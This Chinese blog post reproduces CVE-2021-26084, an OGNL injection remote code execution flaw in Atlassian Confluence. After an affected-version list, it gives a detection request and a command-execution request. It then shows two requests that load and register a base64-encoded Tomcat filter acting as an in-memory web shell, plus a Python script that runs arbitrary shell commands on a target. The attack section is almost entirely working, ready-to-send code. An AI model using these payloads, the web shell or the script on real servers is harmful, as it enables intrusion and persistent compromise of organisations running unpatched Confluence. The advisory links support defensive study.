Atlassian Confluence OGNL表达式注入RCE CVE-2021-26084

影响版本

  • All 4.x.x versions

  • All 5.x.x versions

  • All 6.0.x versions

  • All 6.1.x versions

  • All 6.2.x versions

  • All 6.3.x versions

  • All 6.4.x versions

  • All 6.5.x versions

  • All 6.6.x versions

  • All 6.7.x versions

  • All 6.8.x versions

  • All 6.9.x versions

  • All 6.10.x versions

  • All 6.11.x versions

  • All 6.12.x versions

  • All 6.13.x versions before 6.13.23

  • All 6.14.x versions

  • All 6.15.x versions

  • All 7.0.x versions

  • All 7.1.x versions

  • All 7.2.x versions

  • All 7.3.x versions

  • All 7.4.x versions before 7.4.11

  • All 7.5.x versions

  • All 7.6.x versions

  • All 7.7.x versions

  • All 7.8.x versions

  • All 7.9.x versions

  • All 7.10.x versions

  • All 7.11.x versions before 7.11.6

  • All 7.12.x versions before 7.12.5

环境搭建

Atlassian Confluence 搭建和调试

漏洞复现

参考:https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

检测

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb

返回包出现999即可证明ognl表达式成功执行。说明漏洞存在。

利用

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 310queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027touch /tmp/hacked\u0027]);x.start()\u0022)}%2b\u0027

注入内存马

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 3326
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/pages/doenterpagevariables.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=55BF0FB2FF4C8731D707970E03B845CB
Connection: closequeryString=lalalala%5Cu0027%2C%28linkCreation%29%280xd0ff90%29%2C%5Cu0027lalalala&linkCreation=%23a%3D%40java.lang.Thread%40currentThread%28%29.getContextClassLoader%28%29%2C%23classfile%3D%22yv66vgAAADQAZwoAEwA4BwA5CAA6CwACADsHADwHAD0IAD4IAD8KAAUAQAoABQBBCgBCAEMKAEQARQsARgBHCgAGAEgKAEkASgoAQgBLCwBMAE0HAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEADExFdmlsRmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAFEBAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAAVieXRlcwEAAltCAQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANsZW4BAAFJAQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQALZmlsdGVyQ2hhaW4BABtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjsBAANyZXEBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAA1TdGFja01hcFRhYmxlBwA5BwBSAQAHZGVzdHJveQEAClNvdXJjZUZpbGUBAA9FdmlsRmlsdGVyLmphdmEMABUAFgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBAANjbWQMAFMAVAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMMABUAVQwAVgBXBwBYDABZAFoHAFsMAFwAXQcAXgwAXwBgDAAVAGEHAGIMAGMAZAwANQAWBwBlDAAiAGYBAApFdmlsRmlsdGVyAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQATamF2YS9pby9JT0V4Y2VwdGlvbgEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQATamF2YS9pby9JbnB1dFN0cmVhbQEABHJlYWQBAAUoW0IpSQEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBAAcoW0JJSSlWAQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYAIQASABMAAQAUAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAcAGQAAAAwAAQAAAAUAGgAbAAAAAQAcAB0AAgAXAAAANQAAAAIAAAABsQAAAAIAGAAAAAYAAQAAAAsAGQAAABYAAgAAAAEAGgAbAAAAAAABAB4AHwABACAAAAAEAAEAIQABACIAIwACABcAAAERAAcACAAAAG8rwAACOgQZBBIDuQAEAgDGAFcRBAC8CDoFuwAFWQa9AAZZAxIHU1kEEghTWQUZBBIDuQAEAgBTtwAJtgAKOgYZBrYACxkFtgAMNgcsuQANAQC7AAZZGQUDFQe3AA62AA8ZBrYAELEtKyy5ABEDALEAAAADABgAAAAqAAoAAAAPAAYAEAASABEAGQASAD8AEwBLABQAYAAVAGUAFgBmABgAbgAZABkAAABSAAgAGQBNACQAJQAFAD8AJwAmACcABgBLABsAKAApAAcAAABvABoAGwAAAAAAbwAqACsAAQAAAG8ALAAtAAIAAABvAC4ALwADAAYAaQAwADEABAAyAAAACAAB%2FABmBwAzACAAAAAGAAIANAAhAAEANQAWAAEAFwAAACsAAAABAAAAAbEAAAACABgAAAAGAAEAAAAeABkAAAAMAAEAAAABABoAGwAAAAEANgAAAAIANw%3D%3D%22%2C%23ClassLoaderClass%3D%40java.lang.Class%40forName%28%22java.lang.ClassLoader%22%29%2C%23defineClassMethod%3D%23ClassLoaderClass.getDeclaredMethods%28%29%5B21%5D%2C%23defineClassMethod.setAccessible%28true%29%2C%23classbytes+%3D+%40java.util.Base64%40getDecoder%28%29.decode%28%23classfile%29%2C%23b%3Dnew+java.lang.Object%5B%5D%7B%23classbytes%2C+new+java.lang.Integer%280%29%2C+new+java.lang.Integer%28%23classbytes.length%29%7D%2C%23defineClassMethod.invoke%28%23a%2C+%23b%29%2C%40java.lang.System%40out.println%28%22Success%22%29
POST /pages/doenterpagevariables.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 1934
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/pages/doenterpagevariables.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=55BF0FB2FF4C8731D707970E03B845CB
Connection: closequeryString=lalalala%5Cu0027%2C%28linkCreation%29%280xd0ff90%29%2C%5Cu0027lalalala&linkCreation=%23a%3D%40java.lang.Thread%40currentThread%28%29.getContextClassLoader%28%29%2C%23filter%3D%23a.loadClass%28%22EvilFilter%22%29.newInstance%28%29%2C%23name%3Dnew+java.lang.String%28%22memshell%22%29%2C%23context1%3D%23a.getResources%28%29.getContext%28%29%2C%23appctx%3D%23context1.getClass%28%29.getDeclaredField%28%22context%22%29%2C%23appctx.setAccessible%28true%29%2C%23applicationContext%3D%23appctx.get%28%23context1%29%2C%23stdctx%3D%23applicationContext.getClass%28%29.getDeclaredField%28%22context%22%29%2C%23stdctx.setAccessible%28true%29%2C%23standardContext%3D%23stdctx.get%28%23applicationContext%29%2C%23Configs%3D%23standardContext.getClass%28%29.getDeclaredField%28%22filterConfigs%22%29%2C%23Configs.setAccessible%28true%29%2C%23filterConfigs%3D%23Configs.get%28%23standardContext%29%2C%23filterDef%3Dnew+org.apache.tomcat.util.descriptor.web.FilterDef%28%29%2C%23filterDef.setFilter%28%23filter%29%2C%23filterDef.setFilterName%28%23name%29%2C%23filterDef.setFilterClass%28%23filter.getClass%28%29.getName%28%29%29%2C%23standardContext.addFilterDef%28%23filterDef%29%2C%23filterMap%3Dnew+org.apache.tomcat.util.descriptor.web.FilterMap%28%29%2C%23filterMap.addURLPattern%28%27%2F*%27%29%2C%23filterMap.setFilterName%28%23name%29%2C%23filterMap.setDispatcher%28%40javax.servlet.DispatcherType%40REQUEST.name%28%29%29%2C%23standardContext.addFilterMapBefore%28%23filterMap%29%2C%23constructor1%3D%40java.lang.Class%40forName%28%22org.apache.catalina.core.ApplicationFilterConfig%22%29.getDeclaredConstructors%28%29%5B0%5D%2C%23constructor1.setAccessible%28true%29%2C%23parameters%3Dnew+java.lang.Object%5B%5D%7B%23standardContext%2C%23filterDef%7D%2C%23filterConfig%3D%23constructor1.newInstance%28%23parameters%29%2C%23filterConfigs.put%28%23name%2C%23filterConfig%29%2C%40java.lang.System%40out.println%28%22Success%22%29
  • 加载恶意filter类
queryString=lalalala\u0027,(linkCreation)(0xd0ff90),\u0027lalalala&linkCreation=
#a=@java.lang.Thread@currentThread().getContextClassLoader(),
#classfile="恶意filter class文件base64",
#ClassLoaderClass=@java.lang.Class@forName("java.lang.ClassLoader"),
#defineClassMethod=#ClassLoaderClass.getDeclaredMethods()[21],
#defineClassMethod.setAccessible(true),
#classbytes = @java.util.Base64@getDecoder().decode(#classfile),
#b=new java.lang.Object[]{#classbytes, new java.lang.Integer(0), new java.lang.Integer(#classbytes.length)},
#defineClassMethod.invoke(#a, #b),
@java.lang.System@out.println("Success")
  • 注册Filter
queryString=lalalala\u0027,(linkCreation)(0xd0ff90),\u0027lalalala&linkCreation=
#a=@java.lang.Thread@currentThread().getContextClassLoader(),
#filter=#a.loadClass("恶意Filter名称").newInstance(),
#name=new java.lang.String("memshell"),
#context1=#a.getResources().getContext(),
#appctx=#context1.getClass().getDeclaredField("context"),
#appctx.setAccessible(true),#applicationContext=#appctx.get(#context1),
#stdctx=#applicationContext.getClass().getDeclaredField("context"),
#stdctx.setAccessible(true),
#standardContext=#stdctx.get(#applicationContext),
#Configs=#standardContext.getClass().getDeclaredField("filterConfigs"),
#Configs.setAccessible(true),
#filterConfigs=#Configs.get(#standardContext),
#filterDef=new org.apache.tomcat.util.descriptor.web.FilterDef(),
#filterDef.setFilter(#filter),
#filterDef.setFilterName(#name),
#filterDef.setFilterClass(#filter.getClass().getName()),
#standardContext.addFilterDef(#filterDef),
#filterMap=new org.apache.tomcat.util.descriptor.web.FilterMap(),
#filterMap.addURLPattern('/*'),
#filterMap.setFilterName(#name),
#filterMap.setDispatcher(@javax.servlet.DispatcherType@REQUEST.name()),
#standardContext.addFilterMapBefore(#filterMap),
#constructor1=@java.lang.Class@forName("org.apache.catalina.core.ApplicationFilterConfig").getDeclaredConstructors()[0],
#constructor1.setAccessible(true),
#parameters=new java.lang.Object[]{#standardContext,#filterDef},
#filterConfig=#constructor1.newInstance(#parameters),
#filterConfigs.put(#name,#filterConfig),
@java.lang.System@out.println("Success")

exp

import requests
import re
import sysdef login(sess):data = {"os_username": "admin","os_password": "admin","login": "登录"}sess.post("http://127.0.0.1:8090/dologin.action", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})return sessdef exp1():sess = requests.Session()sess = login(sess)data = {"featureKey": payload}res = sess.post("http://127.0.0.1:8090/users/darkfeatures.action", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})result = re.findall('value="{(.*)=null}', re.findall('<input type="text" name="featureKey" id="featureKey"(.*)class="text', res.text)[0].strip())[0].replace("$$", "\n")return resultdef exp2():sess = requests.Session()url = "http://127.0.0.1:8090/pages/doenterpagevariables.action"data = {"queryString": payload}res = sess.post(url, data=data, proxies={"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"})result = re.findall('value="{(.*)=null}', re.findall('name="queryString"(.*)/>', res.text)[0].strip())[0].replace("$$", "\n")return resultdef isWin():return Truedef main():res = exp2()print(res)if __name__ == '__main__':cmd = "ls -al"cmd = sys.argv[1]payload = """\\u0027+#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var a=new java.lang.ProcessBuilder(\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027"""+cmd+"""\\u0027);var b=new java.io.InputStreamReader(a.start().getInputStream(),\\u0027gbk\\u0027);var c=new java.io.BufferedReader(b);var sb = new java.lang.StringBuffer();while((line=c.readLine())!=null){sb.append(line+\\u0027$$\\u0027);}sb.toString();\\u0022)}+\\u0027"""main()

参考资料

漏洞通告

  • 【漏洞通告】Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084) (qq.com)
  • Confluence Security Advisory - 2021-08-25 | Confluence Data Center and Server 7.13 | Atlassian Documentation
  • [CONFSERVER-67940] Confluence Server Webwork OGNL injection - CVE-2021-26084 - Create and track feature requests for Atlassian products.
  • [JRASERVER-70944] Make use of Secure Introspector in Velocity Templates - CVE-2019-20409 - Create and track feature requests for Atlassian products.

漏洞分析

  • writeups/Confluence-RCE.md at main · httpvoid/writeups (github.com)
  • 暂时无法在文档外展示此内容

POC/EXP

  • h3v0x/CVE-2021-26084_Confluence: Confluence Server Webwork OGNL injection (github.com)
  • dinhbaouit/CVE-2021-26084 (github.com)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/164759.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

P1664 每日打卡心情好 题解

文章目录 题目背景题目描述输入格式输出格式样例样例输入样例输出 数据范围与提示思路及部分实现完整代码文章小结 题目背景 在洛谷中&#xff0c;打卡不只是一个简单的鼠标点击动作&#xff0c;通过每天在洛谷打卡&#xff0c;可以清晰地记录下自己在洛谷学习的足迹。通过每天…

Python数据挖掘实用案例——自动售货机销售数据分析与应用

&#x1f680;欢迎来到本文&#x1f680; &#x1f349;个人简介&#xff1a;陈童学哦&#xff0c;目前学习C/C、算法、Python、Java等方向&#xff0c;一个正在慢慢前行的普通人。 &#x1f3c0;系列专栏&#xff1a;陈童学的日记 &#x1f4a1;其他专栏&#xff1a;CSTL&…

瑞芯微RKNN开发·yolov5

官方预训练模型转换 下载yolov5-v6.0分支源码解压到本地&#xff0c;并配置基础运行环境。下载官方预训练模型 yolov5n.ptyolov5s.ptyolov5m.pt… 进入yolov5-6.0目录下&#xff0c;新建文件夹weights&#xff0c;并将步骤2中下载的权重文件放进去。修改models/yolo.py文件 …

汽车安全的未来:毫米波雷达在碰撞避免系统中的角色

随着科技的飞速发展&#xff0c;汽车安全系统变得愈加智能化&#xff0c;而毫米波雷达技术正是这一领域的亮点之一。本文将深入探讨毫米波雷达在汽车碰撞避免系统中的关键角色&#xff0c;以及其对未来汽车安全的影响。 随着城市交通的拥堵和驾驶环境的变化&#xff0c;汽车安全…

Cannot use object of type __PHP_Incomplete_Class as array

场景&#xff1a;将项目复制 出来一份后&#xff0c;修改控制器&#xff0c;打开后就报错 解决&#xff1a;将runtime 清除后就正常了

jenkins 原理篇——pipeline流水线 声明式语法详解

大家好&#xff0c;我是蓝胖子&#xff0c;相信大家平时项目中或多或少都有用到jenkins&#xff0c;它的piepeline模式能够对项目的发布流程进行编排&#xff0c;优化部署效率&#xff0c;减少错误的发生&#xff0c;如何去写一个pipeline脚本呢&#xff0c;今天我们就来简单看…

手写一个PrattParser基本运算解析器3: 基于Swift的PrattParser的项目概述

点击查看 基于Swift的PrattParser项目 PrattParser项目概述 前段时间一直想着手恶补 编译原理 的相关知识, 一开始打算直接读大学的 编译原理, 虽然内容丰富, 但是着实抽象难懂. 无意间看到B站的熊爷关于普拉特解析器相关内容, 感觉是一个非常好的切入点.所以就写了基于Swift版…

软考系列(系统架构师)- 2018年系统架构师软考案例分析考点

试题一 软件架构&#xff08;非功能性需求、C/S 架构&#xff09; 【问题1】&#xff08;8分&#xff09; 在系统架构设计中&#xff0c;决定系统架构设计的非功能性需求主要有四类&#xff1a;操作性需求、性能需求、安全性需求和文化需求。请简要说明四类需求的含义。 (1) …

推荐《中华小当家》

《中华小当家&#xff01;》 [1] 是日本漫画家小川悦司创作的漫画。该作品于1995年至1999年在日本周刊少年Magazine上连载。作品亦改编为同名电视动画&#xff0c;并于1997年发行播出。 时隔20年推出续作《中华小当家&#xff01;极》&#xff0c;于2017年11月17日开始连载。…

力扣每日一题48:旋转图像

题目描述&#xff1a; 给定一个 n n 的二维矩阵 matrix 表示一个图像。请你将图像顺时针旋转 90 度。 你必须在 原地 旋转图像&#xff0c;这意味着你需要直接修改输入的二维矩阵。请不要 使用另一个矩阵来旋转图像。 示例 1&#xff1a; 输入&#xff1a;matrix [[1,2,3],…

H3C交换机 万兆光模块可以插在千兆光口上使用吗?

环境&#xff1a; S6520X-24ST-SI交换机 H3C LSWM1QSTK2万兆40G堆叠线QSFP 问题描述&#xff1a; H3C交换机 万兆光模块可以插在千兆光口上使用吗&#xff1f; 答案&#xff1a; H3C交换机的万兆光模块&#xff08;10 Gigabit Ethernet Module&#xff09;通常使用的是SFP…

YOLO目标检测——红白细胞血小板数据集【含对应voc、coco和yolo三种格式标签】

实际项目应用&#xff1a;红白细胞血小板计数和分类数据集说明&#xff1a;YOLO目标检测数据集&#xff0c;真实场景的高质量图片数据&#xff0c;数据场景丰富。使用lableimg标注软件标注&#xff0c;标注框质量高&#xff0c;含voc(xml)、coco(json)和yolo(txt)三种格式标签&…

【试题032】C语言关系运算符例题

1.题目&#xff1a;设int a2,b4,c5;&#xff0c;则表达式ab!c>b>a的值为&#xff1f; 2.代码分析&#xff1a; //设int a2,b4,c5;&#xff0c;则表达式ab!c>b>a的值为?int a 2, b 4, c 5;printf("%d\n", (a b ! c > b > a));//分析&#xff…

攻防世界web篇-disabled_button

一个不能按的按钮&#xff0c;试过点击&#xff0c;确实是点不了&#xff0c;所以只能查看源代码喽 经过仔细查看&#xff0c;发现这里多了disabled&#xff0c;这个参数在linux中是禁止的意思&#xff0c;大概是这个意思吧&#xff0c;毕竟开机不自启就用这个参数 在控制台这…

专题:链表常考题目汇总

文章目录 反转类型&#xff1a;206.反转链表完整版二刷记录 25. K个一组反转链表1 &#xff1a;子链表左闭右闭反转版本2 &#xff1a; 子链表左闭右开反转版本&#xff08;推荐&#xff09;⭐反转链表左闭右闭和左闭右开 合并类型&#xff1a;21.合并两个有序链表1: 递归法2: …

【多线程】线程安全问题和解决方案

我们来看下面这一段代码 public class demo {public static void main(String[] args) throws InterruptedException {Cou count new Cou();Thread t1 new Thread(() -> {for (int i 0; i < 10000; i) {count.add();}});Thread t2 new Thread(() -> {for (int i …

【微信小程序】6天精准入门(第4天:自定义组件及案例界面)附源码

一、自定义组件 1、介绍 从小程序基础库版本 1.6.3 开始&#xff0c;小程序支持简洁的组件化编程。所有自定义组件相关特性都需要基础库版本 1.6.3 或更高。 开发者可以将页面内的功能模块抽象成自定义组件&#xff0c;以便在不同的页面中重复使用&#xff1b;也可以将复杂的页…

Linux 下安装配置部署MySql8.0

一 . 准备工作 MySQL安装包&#xff1a;在官网下载需要的版本&#xff0c;这里我用的版本是 MySQL 8.0.34 https://dev.mysql.com/downloads/mysql/ 本次linux机器使用的是阿里云ECS实例 二 . 开始部署 1. 将安装包上传至服务器 解压到当前文件夹 tar -zxvf mysql-8.0.34…

解决方法:从客户端(---<A href=“http://l...“)中检测到有潜在危险的 Request.Form 值。

从客户端(-----<A href"http://l...")中检测到有潜在危险的 Request.Form 值。 解决方法&#xff1a;应该是不同的.net Framework版本对代码的校验不同&#xff0c;造成在高版本操作系统&#xff08;即高.net Framework版本校验&#xff09;不兼容&#xff0c;可…

4 OpenCV实现多目三维重建(多张图片增量式生成稀疏点云)【附源码】

本文是基于 OpenCV4.80 进行的&#xff0c;关于环境的配置可能之后会单独说&#xff0c;先提一嘴 vcpkg 真好用 1 大致流程 从多张图片逐步生成稀疏点云&#xff0c;这个过程通常包括以下步骤&#xff1a; 初始重建&#xff1a; 初始两张图片的选择十分重要&#xff0c;这是整…